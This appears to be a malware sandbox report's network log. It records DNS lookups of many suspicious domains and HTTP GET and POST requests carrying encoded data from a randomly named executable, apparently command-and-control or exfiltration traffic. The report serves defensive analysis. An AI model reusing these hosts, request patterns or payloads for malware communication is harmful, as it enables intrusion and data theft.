                                                                                  Dec 9, 2024 07:00:22.264312029 CET5002180192.168.2.7172.67.215.235
                                                                                  Dec 9, 2024 07:00:22.271965027 CET8050021172.67.215.235192.168.2.7
                                                                                  Dec 9, 2024 07:00:22.272054911 CET5002180192.168.2.7172.67.215.235
                                                                                  Dec 9, 2024 07:00:22.275434971 CET5002180192.168.2.7172.67.215.235
                                                                                  Dec 9, 2024 07:00:22.394782066 CET8050021172.67.215.235192.168.2.7
                                                                                  Dec 9, 2024 07:00:27.607300997 CET5002280192.168.2.7172.67.145.234
                                                                                  Dec 9, 2024 07:00:27.727829933 CET8050022172.67.145.234192.168.2.7
                                                                                  Dec 9, 2024 07:00:27.730257034 CET5002280192.168.2.7172.67.145.234
                                                                                  Dec 9, 2024 07:00:27.745157957 CET5002280192.168.2.7172.67.145.234
                                                                                  Dec 9, 2024 07:00:27.864379883 CET8050022172.67.145.234192.168.2.7
                                                                                  Dec 9, 2024 07:00:28.970876932 CET8050022172.67.145.234192.168.2.7
                                                                                  Dec 9, 2024 07:00:28.970899105 CET8050022172.67.145.234192.168.2.7
                                                                                  Dec 9, 2024 07:00:28.970978022 CET5002280192.168.2.7172.67.145.234
                                                                                  Dec 9, 2024 07:00:30.961020947 CET5002280192.168.2.7172.67.145.234
                                                                                  Dec 9, 2024 07:00:31.979919910 CET5002380192.168.2.7172.67.145.234
                                                                                  Dec 9, 2024 07:00:32.099172115 CET8050023172.67.145.234192.168.2.7
                                                                                  Dec 9, 2024 07:00:32.102195978 CET5002380192.168.2.7172.67.145.234
                                                                                  Dec 9, 2024 07:00:32.115936041 CET5002380192.168.2.7172.67.145.234
                                                                                  Dec 9, 2024 07:00:32.235347033 CET8050023172.67.145.234192.168.2.7

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Dec 9, 2024 06:56:56.362745047 CET6439353192.168.2.71.1.1.1
                                                                                  Dec 9, 2024 06:56:57.367064953 CET6439353192.168.2.71.1.1.1
                                                                                  Dec 9, 2024 06:56:57.457525015 CET53643931.1.1.1192.168.2.7
                                                                                  Dec 9, 2024 06:56:57.503634930 CET53643931.1.1.1192.168.2.7
                                                                                  Dec 9, 2024 06:57:13.963654041 CET5494053192.168.2.71.1.1.1
                                                                                  Dec 9, 2024 06:57:14.421592951 CET53549401.1.1.1192.168.2.7
                                                                                  Dec 9, 2024 06:57:28.807216883 CET5394053192.168.2.71.1.1.1
                                                                                  Dec 9, 2024 06:57:29.624012947 CET53539401.1.1.1192.168.2.7
                                                                                  Dec 9, 2024 06:57:44.042133093 CET5351453192.168.2.71.1.1.1
                                                                                  Dec 9, 2024 06:57:44.315646887 CET53535141.1.1.1192.168.2.7
                                                                                  Dec 9, 2024 06:57:52.375577927 CET5872653192.168.2.71.1.1.1
                                                                                  Dec 9, 2024 06:57:52.689178944 CET53587261.1.1.1192.168.2.7
                                                                                  Dec 9, 2024 06:58:00.746124983 CET6514653192.168.2.71.1.1.1
                                                                                  Dec 9, 2024 06:58:01.757503033 CET6514653192.168.2.71.1.1.1
                                                                                  Dec 9, 2024 06:58:01.839505911 CET53651461.1.1.1192.168.2.7
                                                                                  Dec 9, 2024 06:58:01.894903898 CET53651461.1.1.1192.168.2.7
                                                                                  Dec 9, 2024 06:58:16.105457067 CET5787953192.168.2.71.1.1.1
                                                                                  Dec 9, 2024 06:58:16.870870113 CET53578791.1.1.1192.168.2.7
                                                                                  Dec 9, 2024 06:58:31.535557985 CET5489453192.168.2.71.1.1.1
                                                                                  Dec 9, 2024 06:58:32.284651041 CET53548941.1.1.1192.168.2.7
                                                                                  Dec 9, 2024 06:58:46.699250937 CET6505353192.168.2.71.1.1.1
                                                                                  Dec 9, 2024 06:58:47.223709106 CET53650531.1.1.1192.168.2.7
                                                                                  Dec 9, 2024 06:59:01.746284008 CET5878853192.168.2.71.1.1.1
                                                                                  Dec 9, 2024 06:59:02.757468939 CET5878853192.168.2.71.1.1.1
                                                                                  Dec 9, 2024 06:59:03.051563025 CET53587881.1.1.1192.168.2.7
                                                                                  Dec 9, 2024 06:59:03.051588058 CET53587881.1.1.1192.168.2.7
                                                                                  Dec 9, 2024 06:59:17.464499950 CET6519053192.168.2.71.1.1.1
                                                                                  Dec 9, 2024 06:59:18.189765930 CET53651901.1.1.1192.168.2.7
                                                                                  Dec 9, 2024 06:59:32.605777025 CET5564053192.168.2.71.1.1.1
                                                                                  Dec 9, 2024 06:59:33.017011881 CET53556401.1.1.1192.168.2.7
                                                                                  Dec 9, 2024 06:59:52.263339043 CET4943553192.168.2.71.1.1.1
                                                                                  Dec 9, 2024 06:59:52.896472931 CET53494351.1.1.1192.168.2.7
                                                                                  Dec 9, 2024 07:00:12.324686050 CET5343653192.168.2.71.1.1.1
                                                                                  Dec 9, 2024 07:00:12.633774042 CET53534361.1.1.1192.168.2.7
                                                                                  Dec 9, 2024 07:00:27.292718887 CET5212353192.168.2.71.1.1.1
                                                                                  Dec 9, 2024 07:00:27.601069927 CET53521231.1.1.1192.168.2.7

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Dec 9, 2024 06:56:56.362745047 CET192.168.2.71.1.1.10xb777Standard query (0)www.zoiheat.xyzA (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:56:57.367064953 CET192.168.2.71.1.1.10xb777Standard query (0)www.zoiheat.xyzA (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:57:13.963654041 CET192.168.2.71.1.1.10x92cdStandard query (0)www.questmatch.proA (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:57:28.807216883 CET192.168.2.71.1.1.10x3a07Standard query (0)www.mrpokrovskii.proA (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:57:44.042133093 CET192.168.2.71.1.1.10x29abStandard query (0)www.sodatool.siteA (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:57:52.375577927 CET192.168.2.71.1.1.10xdf2aStandard query (0)www.tb0.shopA (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:58:00.746124983 CET192.168.2.71.1.1.10xf560Standard query (0)www.kvsj.netA (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:58:01.757503033 CET192.168.2.71.1.1.10xf560Standard query (0)www.kvsj.netA (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:58:16.105457067 CET192.168.2.71.1.1.10x3ea6Standard query (0)www.learniit.infoA (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:58:31.535557985 CET192.168.2.71.1.1.10x263bStandard query (0)www.bankseedz.infoA (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:58:46.699250937 CET192.168.2.71.1.1.10x6449Standard query (0)www.dietcoffee.onlineA (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:59:01.746284008 CET192.168.2.71.1.1.10x5140Standard query (0)www.smartcongress.netA (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:59:02.757468939 CET192.168.2.71.1.1.10x5140Standard query (0)www.smartcongress.netA (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:59:17.464499950 CET192.168.2.71.1.1.10x1012Standard query (0)www.carsten.studioA (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:59:32.605777025 CET192.168.2.71.1.1.10xc0e7Standard query (0)www.krshop.shopA (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:59:52.263339043 CET192.168.2.71.1.1.10xd91Standard query (0)www.rysanekbeton.cloudA (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 07:00:12.324686050 CET192.168.2.71.1.1.10x577fStandard query (0)www.airrelax.shopA (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 07:00:27.292718887 CET192.168.2.71.1.1.10x1910Standard query (0)www.vayui.topA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Dec 9, 2024 06:56:57.457525015 CET1.1.1.1192.168.2.70xb777No error (0)www.zoiheat.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 9, 2024 06:56:57.457525015 CET1.1.1.1192.168.2.70xb777No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 9, 2024 06:56:57.457525015 CET1.1.1.1192.168.2.70xb777No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:56:57.503634930 CET1.1.1.1192.168.2.70xb777No error (0)www.zoiheat.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 9, 2024 06:56:57.503634930 CET1.1.1.1192.168.2.70xb777No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 9, 2024 06:56:57.503634930 CET1.1.1.1192.168.2.70xb777No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:57:14.421592951 CET1.1.1.1192.168.2.70x92cdNo error (0)www.questmatch.pro104.21.62.184A (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:57:14.421592951 CET1.1.1.1192.168.2.70x92cdNo error (0)www.questmatch.pro172.67.138.37A (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:57:29.624012947 CET1.1.1.1192.168.2.70x3a07No error (0)www.mrpokrovskii.pro85.25.177.138A (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:57:44.315646887 CET1.1.1.1192.168.2.70x29abName error (3)www.sodatool.sitenonenoneA (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:57:52.689178944 CET1.1.1.1192.168.2.70xdf2aName error (3)www.tb0.shopnonenoneA (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:58:01.839505911 CET1.1.1.1192.168.2.70xf560No error (0)www.kvsj.net173.236.199.97A (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:58:01.894903898 CET1.1.1.1192.168.2.70xf560No error (0)www.kvsj.net173.236.199.97A (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:58:16.870870113 CET1.1.1.1192.168.2.70x3ea6No error (0)www.learniit.info203.161.42.73A (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:58:32.284651041 CET1.1.1.1192.168.2.70x263bNo error (0)www.bankseedz.info46.30.211.38A (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:58:47.223709106 CET1.1.1.1192.168.2.70x6449No error (0)www.dietcoffee.online77.68.64.45A (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:59:03.051563025 CET1.1.1.1192.168.2.70x5140No error (0)www.smartcongress.netsmartcongress.netCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 9, 2024 06:59:03.051563025 CET1.1.1.1192.168.2.70x5140No error (0)smartcongress.net146.88.233.115A (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:59:03.051588058 CET1.1.1.1192.168.2.70x5140No error (0)www.smartcongress.netsmartcongress.netCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 9, 2024 06:59:03.051588058 CET1.1.1.1192.168.2.70x5140No error (0)smartcongress.net146.88.233.115A (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:59:18.189765930 CET1.1.1.1192.168.2.70x1012No error (0)www.carsten.studiocarsten.studioCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 9, 2024 06:59:18.189765930 CET1.1.1.1192.168.2.70x1012No error (0)carsten.studio217.160.0.200A (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:59:33.017011881 CET1.1.1.1192.168.2.70xc0e7No error (0)www.krshop.shop13.248.169.48A (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:59:33.017011881 CET1.1.1.1192.168.2.70xc0e7No error (0)www.krshop.shop76.223.54.146A (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 06:59:52.896472931 CET1.1.1.1192.168.2.70xd91No error (0)www.rysanekbeton.cloudrysanekbeton.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 9, 2024 06:59:52.896472931 CET1.1.1.1192.168.2.70xd91No error (0)rysanekbeton.cloud81.2.196.19A (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 07:00:12.633774042 CET1.1.1.1192.168.2.70x577fNo error (0)www.airrelax.shop172.67.215.235A (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 07:00:12.633774042 CET1.1.1.1192.168.2.70x577fNo error (0)www.airrelax.shop104.21.16.206A (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 07:00:27.601069927 CET1.1.1.1192.168.2.70x1910No error (0)www.vayui.top172.67.145.234A (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 07:00:27.601069927 CET1.1.1.1192.168.2.70x1910No error (0)www.vayui.top104.21.95.160A (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • www.zoiheat.xyz
                                                                                  • www.questmatch.pro
                                                                                  • www.mrpokrovskii.pro
                                                                                  • www.kvsj.net
                                                                                  • www.learniit.info
                                                                                  • www.bankseedz.info
                                                                                  • www.dietcoffee.online
                                                                                  • www.smartcongress.net
                                                                                  • www.carsten.studio
                                                                                  • www.krshop.shop
                                                                                  • www.rysanekbeton.cloud
                                                                                  • www.airrelax.shop
                                                                                  • www.vayui.top

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.74976685.159.66.93805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:56:57.600594997 CET558OUTGET /ti6k/?PHM8hj-=aooN9XnxZY5vLLqgNnNPDa+Wz6ZYVA+W9S/CD7OrytslWQsmx2XgKXMgpigq5ofFs8zPBHqDWa6akLIztBxoZf4FTaZeBdqZz3vksMYpoRC+eIBKeBja80AWwPS+rTgBCnnhKClLlEID&tHfx=9byl HTTP/1.1
                                                                                  Host: www.zoiheat.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Dec 9, 2024 06:56:58.918168068 CET225INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.14.1
                                                                                  Date: Mon, 09 Dec 2024 05:56:58 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  X-Rate-Limit-Limit: 5s
                                                                                  X-Rate-Limit-Remaining: 19
                                                                                  X-Rate-Limit-Reset: 2024-12-09T05:57:03.7011834Z


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.749805104.21.62.184805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:57:14.559535027 CET832OUTPOST /1yxc/ HTTP/1.1
                                                                                  Host: www.questmatch.pro
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.questmatch.pro
                                                                                  Referer: http://www.questmatch.pro/1yxc/
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 68 50 48 57 33 44 36 55 44 36 46 62 58 50 73 55 49 33 6c 67 63 2b 47 73 61 43 51 6b 49 61 35 63 43 41 57 70 64 45 4f 70 54 4c 2b 67 68 39 57 61 68 45 2f 72 77 50 52 35 54 32 4f 2f 52 75 42 47 34 74 4c 52 51 72 65 77 48 73 49 49 2f 77 46 78 38 2b 32 59 45 66 7a 50 4e 54 6c 6f 74 56 45 54 70 45 49 55 62 52 55 35 2b 46 66 63 72 71 6a 77 46 56 74 4b 69 55 75 4a 61 6f 2f 53 46 35 35 53 66 69 52 58 76 72 61 6a 35 65 75 6c 50 56 4f 66 53 4e 6d 47 48 30 72 32 66 70 52 2f 67 30 37 51 74 41 6c 65 31 64 47 7a 62 53 32 78 2f 44 65 68 33 75 2f 79 33 48 49 35 51 43 70 65 48 35 73 58 4d 62 31 31 74 33 75 36 67 75 41 37 70 36 49 70 75 77 3d 3d
                                                                                  Data Ascii: PHM8hj-=hPHW3D6UD6FbXPsUI3lgc+GsaCQkIa5cCAWpdEOpTL+gh9WahE/rwPR5T2O/RuBG4tLRQrewHsII/wFx8+2YEfzPNTlotVETpEIUbRU5+FfcrqjwFVtKiUuJao/SF55SfiRXvraj5eulPVOfSNmGH0r2fpR/g07QtAle1dGzbS2x/Deh3u/y3HI5QCpeH5sXMb11t3u6guA7p6Ipuw==
                                                                                  Dec 9, 2024 06:57:15.822072029 CET1236INHTTP/1.1 404
                                                                                  Date: Mon, 09 Dec 2024 05:57:15 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Origin
                                                                                  Vary: Access-Control-Request-Method
                                                                                  Vary: Access-Control-Request-Headers
                                                                                  X-Correlation-ID: 3c7f0a17-6d8d-4fcc-a8fb-8516da71c72d
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  CF-Connecting-IP: 8.46.123.228
                                                                                  CF-IPCountry: US
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x%2Fa68cddeUFkkBLkpUbhq44aaIa7OoZD%2BWf6uF6HQy0jZcAp2ku9x4E6Dswo9tD7Hou%2B6BvudyeIXv1AXUmWXHi4FC8ue%2FQGZPCRpAuvxPGs5K2bF7sRcxq1anQIOS8SVJTv%2Bfc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ef2c1b3bd760f79-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2086&min_rtt=2086&rtt_var=1043&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=832&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 8e 41 0a 83 30 10 45 af 12 66 6d b0 b6 d6 48 0e 50 70 63 0b 75 57 ba 18 33 49 2b 4d 33 10 23 54 c4 bb 17 71 fd 1f ef fd 05 7a a6 19 74 98 bc cf c0 c6 c8 71 04 bd 80 61 b2 a0 cb 43 99 41 c0 af 05 0d 2d 27
                                                                                  Data Ascii: b5$A0EfmHPpcuW3I+M3#TqztqaCA-'
                                                                                  Dec 9, 2024 06:57:15.822108030 CET109INData Raw: 71 e1 29 10 64 40 36 e1 e0 47 d0 0f 68 59 bc 31 90 b7 51 b8 6d 15 8e a3 b8 5d ef 9d c8 8b f9 67 72 78 ae 1b df 4f af 26 38 de d5 31 5a 8f 69 e0 d0 10 68 38 19 e5 0e 58 28 59 51 4d b2 74 c6 48 ac 5d 2f eb 73 51 11 aa c2 a8 e3 d6 1c 13 9a 4f 17 d1
                                                                                  Data Ascii: q)d@6GhY1Qm]grxO&81Zih8X(YQMtH]/sQO9A#0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.749811104.21.62.184805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:57:17.223403931 CET852OUTPOST /1yxc/ HTTP/1.1
                                                                                  Host: www.questmatch.pro
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.questmatch.pro
                                                                                  Referer: http://www.questmatch.pro/1yxc/
                                                                                  Content-Length: 240
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 68 50 48 57 33 44 36 55 44 36 46 62 57 75 63 55 4c 51 78 67 58 2b 47 76 52 69 51 6b 44 36 35 51 43 41 53 70 64 46 37 79 54 35 61 67 76 35 53 61 67 46 2f 72 31 50 52 35 4c 6d 4f 41 53 65 42 33 34 73 33 5a 51 72 53 77 48 76 30 49 2f 31 35 78 38 4e 4f 62 45 50 7a 4a 47 7a 6c 71 79 46 45 54 70 45 49 55 62 52 41 44 2b 46 48 63 72 61 54 77 55 42 35 4a 72 30 75 4b 4c 6f 2f 53 53 70 35 65 66 69 52 31 76 76 43 46 35 64 47 6c 50 52 4b 66 53 38 6d 42 4f 30 72 76 48 4a 51 4e 6d 31 69 6b 31 51 73 6a 76 63 47 74 57 69 47 70 7a 56 66 44 74 4d 7a 65 70 57 77 43 55 41 4e 6f 51 66 78 69 4f 61 78 74 67 56 61 62 2f 5a 6c 52 6b 6f 70 74 34 4a 79 7a 65 73 44 4c 69 65 50 5a 37 59 50 4e 30 59 75 50 78 65 49 3d
                                                                                  Data Ascii: PHM8hj-=hPHW3D6UD6FbWucULQxgX+GvRiQkD65QCASpdF7yT5agv5SagF/r1PR5LmOASeB34s3ZQrSwHv0I/15x8NObEPzJGzlqyFETpEIUbRAD+FHcraTwUB5Jr0uKLo/SSp5efiR1vvCF5dGlPRKfS8mBO0rvHJQNm1ik1QsjvcGtWiGpzVfDtMzepWwCUANoQfxiOaxtgVab/ZlRkopt4JyzesDLiePZ7YPN0YuPxeI=
                                                                                  Dec 9, 2024 06:57:18.480420113 CET1236INHTTP/1.1 404
                                                                                  Date: Mon, 09 Dec 2024 05:57:18 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Origin
                                                                                  Vary: Access-Control-Request-Method
                                                                                  Vary: Access-Control-Request-Headers
                                                                                  X-Correlation-ID: 478b1926-0965-4581-a5e4-f5e6b2524868
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  CF-Connecting-IP: 8.46.123.228
                                                                                  CF-IPCountry: US
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D39rVOGc2%2FfKbFS6atmCHO9J%2FMgGJJ0gy0pV0s2K%2BcUueoKEeHwKhy7vkWfhV6sFfUaLT%2FgKlGAz1S5Io7rBeraDcbdj2gX%2F%2BCKizrLOW9%2Fnp45%2FwlMWATFh0fLmsA8r1ymkc2E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ef2c1c45c78c407-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1606&rtt_var=803&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=852&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 62 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 8e 4d 0a 83 30 14 06 af 12 be b5 e2 0f 89 b5 39 40 c1 8d 2d d4 5d e9 22 9a 67 2b 4d f3 20 2a 54 c4 bb 17 71 3d c3 30 2b 5a b6 0b b4 9f 9d 8b 40 21 70 18 a1 57 74 6c 09 5a a6 32 82 37 5f 82
                                                                                  Data Ascii: b6$M09@-]"g+M *Tq=0+Z@!pWtlZ27_
                                                                                  Dec 9, 2024 06:57:18.480447054 CET115INData Raw: 46 cd 93 b8 f0 ec 2d 22 58 9a cc e0 46 e8 07 6a 16 6f e3 ad a3 20 fa 9d 8a 9e 83 b8 5d ef 8d 48 b2 e5 d7 25 78 6e bb df ce af ca f7 7c a4 43 20 67 a6 81 7d 65 a1 21 4f 65 9b 9d f3 22 4e cf 85 8a a5 2a b3 d8 28 92 71 af a8 68 73 95 cb b2 28 11 61
                                                                                  Data Ascii: F-"XFjo ]H%xn|C g}e!Oe"N*(qhs(aLi?0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.749820104.21.62.184805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:57:19.878730059 CET1865OUTPOST /1yxc/ HTTP/1.1
                                                                                  Host: www.questmatch.pro
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.questmatch.pro
                                                                                  Referer: http://www.questmatch.pro/1yxc/
                                                                                  Content-Length: 1252
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 68 50 48 57 33 44 36 55 44 36 46 62 57 75 63 55 4c 51 78 67 58 2b 47 76 52 69 51 6b 44 36 35 51 43 41 53 70 64 46 37 79 54 35 53 67 76 4b 61 61 68 6d 48 72 32 50 52 35 56 32 4f 46 53 65 42 71 34 74 66 64 51 72 75 4f 48 70 77 49 38 58 68 78 31 63 4f 62 4b 50 7a 4a 62 6a 6c 72 74 56 45 47 70 45 5a 64 62 52 51 44 2b 46 48 63 72 59 37 77 55 56 74 4a 74 30 75 4a 61 6f 2f 47 46 35 34 4a 66 6d 39 50 76 76 4f 7a 34 73 6d 6c 50 78 61 66 56 65 2b 42 42 30 72 74 53 4a 51 56 6d 31 65 37 31 51 78 63 76 63 69 54 57 6c 71 70 32 68 47 66 33 76 76 54 39 77 6b 2b 56 69 70 4b 54 4d 68 78 44 5a 5a 7a 6f 45 75 58 31 62 52 2b 67 35 68 32 77 4d 72 51 49 71 50 6b 73 65 32 50 71 4f 75 63 6e 34 32 6c 6e 6f 4a 59 50 73 51 69 51 79 43 4c 39 6c 53 56 56 31 50 61 56 44 59 6e 61 37 47 38 64 79 6c 5a 73 4f 57 5a 4b 4f 6c 38 58 6b 53 66 37 6e 39 52 75 34 41 30 4a 69 69 6c 52 61 69 48 34 30 6c 32 48 71 74 30 38 2f 6e 45 4d 59 51 6f 66 32 68 41 7a 6b 66 30 53 76 32 33 56 30 70 63 44 48 56 53 6c 75 68 32 66 5a [TRUNCATED]
